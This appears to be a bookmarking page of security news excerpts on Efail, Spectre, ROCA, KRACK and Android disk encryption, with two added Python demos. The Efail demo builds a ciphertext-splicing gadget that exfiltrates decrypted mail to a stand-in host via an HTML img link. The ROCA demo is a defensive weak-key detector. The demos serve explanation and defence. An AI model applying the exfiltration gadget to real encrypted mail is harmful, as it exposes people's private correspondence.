Efail or OpenPGP is safer than S/MIME
Some may have noticed that the EFF has put out warnings about the use of PGP which I consider pretty overblown. The GnuPG team was not contacted by the researchers but I got access to a version of the paper related to KMail. It seems to be the complete paper with just the names of the other MUAs redacted. Here is a response I wrote on the weekend to a reporter who inquired about this problem:

The topic of that paper is that HTML is used as a back channel to create an oracle for modified encrypted mails. It has long been known that HTML mails and in particular external links like <img href=""/> are evil if the MUA actually honors them (which many meanwhile seem to do again; see all these newsletters). Due to broken MIME parsers a bunch of MUAs seem to concatenate decrypted HTML MIME parts, which makes it easy to plant such HTML snippets.

There are two ways to mitigate this attack:
- Don't use HTML mails. Or if you really need to read them, use a proper MIME parser and disallow any access to external links.
- Use authenticated encryption.

The latter is actually easy for OpenPGP because we started to use authenticated encryption (AE) in 2000 or 2001. Our AE is called MDC (Modification Detection Code) and was introduced back then for a very similar attack. [NB: Massive fail by the entire domestic and foreign press, EFF included.]
gnupg-users mailinglist, 14.05.2018
krypto_openpgp  software_krypto_gnupg  ngo_eff  itsicherheit_exploit_flaw  uni_de_fh_münster  software_mua_tb_enigmail  software_mua_html_mail  krypto_smime  itsicherheit_implementierung  itsicherheit_verdeckterkanal_data_exfil  itsicherheit_strategie  internet_protokoll_mime  krypto_openpgp_mdc  uni_nl_ku_leuven  uni_de_bochum 
7 days ago by kraven
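As an added example (written for this page; not code from Werner Koch's post, the Efail paper or GnuPG), the following Python models both mitigations from the post and shows which one stops which attack. The cipher is a toy SHA-256 keystream standing in for OpenPGP's CFB mode (an assumption; both let an attacker flip plaintext bits by flipping ciphertext bits), the MDC is modelled as a SHA-1 of the plaintext encrypted along with it, as RFC 4880's MDC packet does (packet framing omitted), and the key, the message, the `x.example` host and the two MUA models are constructed for the demonstration.

```python
import hashlib
import hmac
import re


# Toy keystream cipher (assumption: stands in for OpenPGP's CFB mode; both
# let an attacker flip plaintext bits by flipping ciphertext bits).
def keystream(key: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return out[:n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, plaintext: bytes, mdc: bool) -> bytes:
    """With mdc=True a SHA-1 of the plaintext is encrypted along with it,
    as OpenPGP's MDC packet does (packet framing omitted here)."""
    data = plaintext + (hashlib.sha1(plaintext).digest() if mdc else b"")
    return xor(data, keystream(key, len(data)))


def decrypt(key: bytes, ciphertext: bytes, mdc: bool):
    """Return (plaintext, integrity_ok).  Without an MDC there is nothing to
    verify, so a tampered ciphertext decrypts 'successfully'."""
    data = xor(ciphertext, keystream(key, len(ciphertext)))
    if not mdc:
        return data, True
    body, tag = data[:-20], data[-20:]
    return body, hmac.compare_digest(tag, hashlib.sha1(body).digest())


def splice(ct: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """Attacker step: the plaintext is known to contain `known` at `offset`;
    flip ciphertext bits so it decrypts to `wanted` instead.  No key needed."""
    delta = xor(known, wanted)
    end = offset + len(delta)
    return ct[:offset] + xor(ct[offset:end], delta) + ct[end:]


# MUA side: which URLs would leave the machine when the mail is displayed?
EXTERNAL = re.compile(rb'<img\s+src="(https?://[^"]*)"', re.I)


def body_of(entity: bytes) -> bytes:
    """Strip the MIME header block of a decrypted entity, if there is one."""
    return entity.split(b"\r\n\r\n", 1)[-1]


def naive_mua(parts):
    """Broken handling: decrypted HTML parts are concatenated into a single
    document and every external reference is dereferenced."""
    return EXTERNAL.findall(b"".join(parts))


def careful_mua(parts):
    """Proper handling: each part is parsed on its own and external
    references are never loaded.  Returns (fetched, blocked)."""
    blocked = [u for part in parts for u in EXTERNAL.findall(part)]
    return [], blocked


# Constructed sample data (not from the paper or the post).
KEY = b"constructed session key"
HEADER = b"Content-Type: text/html\r\n\r\n"  # predictable start of a PGP/MIME entity
SECRET = b"<p>Meet at the usual place, 21:00.</p>"
GADGET = b'<img src="http://x.example/'      # same length as HEADER
assert len(GADGET) == len(HEADER)


def direct_exfiltration(mdc: bool):
    """Ciphertext untouched; the attacker only wraps the encrypted part in
    HTML parts of his own.  Returns (naive_fetches, careful_fetches, mdc_ok)."""
    ct = encrypt(KEY, HEADER + SECRET, mdc)
    pt, ok = decrypt(KEY, ct, mdc)
    parts = [GADGET, body_of(pt), b'">']
    return naive_mua(parts), careful_mua(parts)[0], ok


def gadget_attack(mdc: bool):
    """Ciphertext modified so the predictable header decrypts to the <img
    opener; a trailing attacker part closes the tag.  Same return shape."""
    ct = splice(encrypt(KEY, HEADER + SECRET, mdc), 0, HEADER, GADGET)
    pt, ok = decrypt(KEY, ct, mdc)
    if not ok:
        return [], [], ok  # integrity failure: nothing is rendered
    parts = [body_of(pt), b'">']
    return naive_mua(parts), careful_mua(parts)[0], ok


if __name__ == "__main__":
    for name, fn in (("direct", direct_exfiltration), ("gadget", gadget_attack)):
        for mdc in (False, True):
            print(name, "mdc" if mdc else "no mdc", fn(mdc))
```

Running it shows the split the post makes: the direct-exfiltration case never touches the ciphertext, so the MDC verifies fine and only the MUA that parses parts separately and refuses external loads keeps the secret in; the gadget case rewrites the ciphertext, which the MDC catches (and a MUA that loads nothing external is safe either way).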
Worst case for Intel: more Spectre holes on the way
Several research teams have already reported a total of eight new security holes in Intel CPUs to the manufacturer; they are currently still being kept secret. All eight ultimately go back to the same design problem that the section "Meltdown and Spectre for Dummies" explains in more detail; they are, so to speak, Spectre Next Generation. Each of the eight holes has received its own number in the directory of all security vulnerabilities (Common Vulnerability Enumerator, CVE) and each requires its own patches; they will probably all get their own names as well. So far we only have concrete information about Intel's processors and their patch plans. There are, however, first indications that at least some ARM CPUs are also affected. Intel itself rates four of the Spectre-NG holes as "high risk"; the danger of the other four is rated merely as medium. One of the Spectre-NG holes simplifies attacks across system boundaries so much that we rate its threat potential considerably higher than Spectre's. Concretely, an attacker could launch his exploit code in a virtual machine (VM) and attack the host system from there, for instance a cloud hoster's server. Or he attacks the VMs of other customers running on the same server.
ct, 03.05.2018
itsicherheit_cpu_meltdown_spectre  itsicherheit_seitenkanalanalyse  itsicherheit_exploit_flaw  itsicherheit_hardware  itsicherheit_implementierung  tech_hw_chip_cpu  tech_hw_chip_cpu_cache  unternehmen_amd  unternehmen_intel  unternehmen_allg_desinformation_propaganda  itsicherheit_by_obscurity  itsicherheit_virtualisierung 
17 days ago by kraven
Reading privileged memory with a side-channel
We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts. Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. So far, there are three known variants of the issue: Variant 1: bounds check bypass (CVE-2017-5753), Variant 2: branch target injection (CVE-2017-5715), Variant 3: rogue data cache load (CVE-2017-5754). Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at: Spectre (variants 1 and 2), Meltdown (variant 3) [NB: Fuck you Intel, my next computer will be non-Intel].
google project zero, 03.01.2018
itsicherheit_exploit_flaw  itsicherheit_malware_spyware  itsicherheit_speicher_aslr  itsicherheit_hardware  itsicherheit_implementierung  itsicherheit_os  itsicherheit_seitenkanalanalyse  unternehmen_intel  sicherheitsforschung_itsicherheit  software_os_linux  software_os_windows  software_os_mac  software_os_kernel  unternehmen_amd  unternehmen_arm  tech_hw_chip_cpu  tech_hw_chip_cpu_cache  itsicherheit_cpu_meltdown_spectre 
january 2018 by kraven
Millions of high-security crypto keys crippled by newly discovered flaw
A crippling flaw in a widely used code library has fatally undermined the security of millions of encryption keys used in some of the highest-stakes settings, including national identity cards, software- and application-signing, and trusted platform modules protecting government and corporate computers. The weakness allows attackers to calculate the private portion of any vulnerable key using nothing more than the corresponding public portion. Hackers can then use the private key to impersonate key owners, decrypt sensitive data, sneak malicious code into digitally signed software, and bypass protections that prevent accessing or tampering with stolen PCs. The five-year-old flaw is also troubling because it's located in code that complies with two internationally recognized security certification standards that are binding on many governments, contractors, and companies around the world. The code library was developed by German chipmaker Infineon and has been generating weak keys since 2012 at the latest. The flaw is the one Estonia's government obliquely referred to last month when it warned that 750,000 digital IDs issued since 2014 were vulnerable to attack. Estonian officials said they were closing the ID card public key database to prevent abuse. Last week, Microsoft, Google, and Infineon all warned how the weakness can impair the protections built into TPM products that ironically enough are designed to give an additional measure of security to highly targeted individuals and organizations. The flaw is the subject of a research paper titled The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli, which will be presented on November 2 at the ACM Conference on Computer and Communications Security. The vulnerability was discovered by Slovak and Czech researchers from Masaryk University in the Czech Republic, Enigma Bridge in Cambridge, UK, and Ca' Foscari University in Italy.
ars technica, 16.10.2017
eid_dokument  itsicherheit_code_signing  itsicherheit_exploit_flaw  tech_hw_chip_krypto_tpm  krypto_bibliothek_rsa_infineon  unternehmen_infineon  krypto_entschlüsselung  krypto_algo_rsa  krypto_faktorisierung  krypto_key_recovery  de_bundesamt_bsi  itsicherheit_zertifizierung  itsicherheit_implementierung  krypto_openpgp  krypto_verschlüsselung_datenträger  krypto_verschlüsselung_kommunikation  krypto_verschlüsselung_transport  tech_hw_krypto_token  krypto_tls_cert  krypto_signierung  krypto_signierung_qes 
october 2017 by kraven
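The article says the private key can be computed from the public key alone; the practitioner's question is how to tell whether a given public key is one of the affected ones. As an added example (written for this page; not the researchers' own tooling or code from the article), here is the public-key fingerprint test the ROCA paper describes: primes produced by the affected Infineon library have the shape k*M + 65537^a mod M, with M the product of the first few small primes, so for every such small prime p the modulus N = p*q satisfies N mod p in the subgroup generated by 65537. The check below asks exactly that for the primes up to 167 (the range the public ROCA detection script covers). The two moduli at the bottom are constructed for the demonstration: the "weak-shaped" one has the residue structure but its factors are not checked for primality, since only the residues matter for the fingerprint; actually factoring a real affected key needs the paper's Coppersmith-based method and serious CPU time, which this example does not attempt.

```python
import math
import random

# The primes the published ROCA fingerprint checks (2 through 167).  An odd
# modulus always passes p = 2; it is kept so M below is the full primorial.
SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53,
                59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113,
                127, 131, 137, 139, 149, 151, 157, 163, 167]
E = 65537


def powers_mod(p: int) -> set:
    """The subgroup <65537> of Z_p^*: every value 65537^k mod p can take."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = x * E % p
    return seen


SUBGROUPS = {p: powers_mod(p) for p in SMALL_PRIMES}


def first_failing_prime(n: int):
    """Return the first small prime p with n mod p outside <65537>, or None if
    n passes everywhere (the fingerprint of an Infineon-generated modulus).
    A random modulus fails with overwhelming probability; a weak one never does."""
    for p in SMALL_PRIMES:
        if n % p not in SUBGROUPS[p]:
            return p
    return None


def roca_fingerprint(n: int) -> bool:
    """True if the modulus looks like it came from the affected library."""
    return first_failing_prime(n) is None


# Constructed moduli for demonstration (assumption: not real keys).  M is the
# primorial of the small primes; the weak library's primes have the shape
# k*M + 65537^a mod M, so the product of two of them lies in <65537> modulo
# every small prime.  Primality of the factors is not enforced here because
# only the residue structure matters for the fingerprint.
M = math.prod(SMALL_PRIMES)


def weak_shape_factor(bits: int, rng: random.Random) -> int:
    k_bits = bits - M.bit_length()
    k = rng.randrange(1 << (k_bits - 1), 1 << k_bits)
    return k * M + pow(E, rng.randrange(1, 1 << 16), M)


_rng = random.Random(2017)
WEAK_N = weak_shape_factor(512, _rng) * weak_shape_factor(512, _rng)
# 2^1024 + 13 is 7 mod 11, and <65537> mod 11 is {1, 10}, so this one fails at 11.
STRONG_N = (1 << 1024) + 13

if __name__ == "__main__":
    for label, n in (("weak-shaped", WEAK_N), ("ordinary", STRONG_N)):
        print(label, roca_fingerprint(n), first_failing_prime(n))
```

To check a real key, pass the integer modulus n of the RSA public key (from a parsed certificate, PGP key or TPM endorsement key) to roca_fingerprint; a True result means the key should be treated as compromised and replaced, a False result only says this particular weakness does not apply.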
Falling through the KRACKs
The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.
matthew green, 16.10.2017
krypto_algo_wpa2  internet_wlan  tech_wifi_wlan  itsicherheit_exploit_flaw  itsicherheit_trafficmanipulation_paketinjektion  krypto_entschlüsselung  krypto_verschlüsselung_transport  verband_ieee  überwachung_internet_mitm  itsicherheit_implementierung 
october 2017 by kraven
India's database with biometric details of its billion citizens ignites privacy debate
In 2008, they formulated Aadhaar, an audacious project "destined" to change the prospects of Indians. It was similar to the Social Security number that US residents are assigned, but its implications were further reaching. Eight years later, Aadhaar, which stores identity information such as a photo, name, address, fingerprints and iris scans of its citizens and also assigns them a unique 12-digit number, has become the world's largest biometrics-based identity system. According to the Indian government, over 1.11 billion people of the country's roughly 1.3 billion citizens have enrolled themselves in the biometrics system. About 99 percent of all adults in India have an Aadhaar card, it said last month. Today, the significance of Aadhaar, which on paper remains an optional program, is undeniable in the country. The government says Aadhaar has already saved it as much as $5 billion. But that's not it.
mashable, 14.02.2017
land_indien  datenbank_biometrie_in_aadhaar  in_uidai  in_uidai_india_stack  bezahlsystem_bargeldlos  biometrie_fingerabdruck  biometrie_gesicht  biometrie_iris  datenschutz_id_management  datenbank_population  datenbank_idnr_schlüssel  itsicherheit_datensicherheit  itsicherheit_by_obscurity  itsicherheit_implementierung  überwachung_person_identifizierung  überwachung_person_profil  unternehmen_ongrid 
february 2017 by kraven
Antivirus software: the snake-oil industry
Users and system administrators regard antivirus programs as indispensable. But many IT security experts are extremely skeptical. Antivirus software is often itself full of security holes, and it has very fundamental limits.
golem, 21.12.2016
itsicherheit_by_obscurity  software_anti_malware_virus  itsicherheit_malware_spyware  itsicherheit_implementierung  überwachung_internet_mitm_sslproxy  itsicherheit_exploit_flaw  itsicherheit_strategie  tech_medien_kompetenz 
december 2016 by kraven
Rigged primes enable backdoors in encryption
A research team has succeeded in computing a discrete logarithm modulo a 1024-bit prime, in only two months of computing time on 2000 to 3000 cores. But the significance of the paper A kilobit hidden SNFS discrete logarithm computation by Fried, Gaudry, Heninger and Thomé reaches much further. It shows that, with the help of cleverly constructed primes, a backdoor can be built into encryption schemes that, according to the current state of research, nobody can detect. Its designer, however, can use it to break the encryption unnoticed. This raises the question of whether that has not long since happened and whether, for example, the NSA has smuggled rigged primes into encryption standards.
heise, 13.10.2016
krypto_backdoor  krypto_problem_dlp  itsicherheit_implementierung  krypto_algo_dh_kex  krypto_algo_dsa_dss  krypto_entschlüsselung  krypto_tls  geheimdienst_us_nsa_ces 
october 2016 by kraven
A Famed Hacker Is Grading Thousands of Programs — and May Revolutionize Software in the Process
At the Black Hat cybersecurity conference in 2014, industry luminary Dan Geer, fed up with the prevalence of vulnerabilities in digital code, made a modest proposal: Software companies should either make their products open source so buyers can see what they’re getting and tweak what they don’t like, or suffer the consequences if their software failed. Mudge and his wife, Sarah, a former NSA mathematician, have developed a first-of-its-kind method for testing and scoring the security of software — a method inspired partly by Underwriters Laboratories, that century-old entity responsible for the familiar circled UL seal that tells you your toaster and hair dryer have been tested for safety and won’t burst into flames. Called the Cyber Independent Testing Lab, the Zatkos’ operation won’t tell you if your software is literally incendiary, but it will give you a way to comparison-shop browsers, applications, and antivirus products according to how hardened they are against attack.
intercept, 29.07.2016
itsicherheit_audit  itsicherheit_exploit_flaw  itsicherheit_implementierung 
july 2016 by kraven
Extracting Qualcomm's KeyMaster Keys - Breaking Android Full Disk Encryption
After covering a TrustZone kernel vulnerability and exploit, I thought this time it might be interesting to explore some of the implications of code-execution within the TrustZone kernel. In this blog post, I'll demonstrate how TrustZone kernel code-execution can be used to effectively break Android's Full Disk Encryption (FDE) scheme. We'll also see some of the inherent issues stemming from the design of Android's FDE scheme, even without any TrustZone vulnerability. I've been in contact with Qualcomm regarding the issue prior to the release of this post, and have let them review the blog post. As always, they've been very helpful and fast to respond. Unfortunately, it seems as though fixing the issue is not simple, and might require hardware changes.
bits, please, 30.06.2016
unternehmen_qualcomm  software_os_linux_android  itsicherheit_exploit_flaw  itsicherheit_firmware_mobilfunkgerät  itsicherheit_hardware  itsicherheit_mobil_os  krypto_entschlüsselung  krypto_verschlüsselung_datenträger  krypto_analyse_bruteforce  krypto_key_recovery  itsicherheit_implementierung  krypto_key_kdf  itsicherheit_by_obscurity  itsicherheit_authentisierung_passwort  überwachung_itforensik  krypto_backdoor 
july 2016 by kraven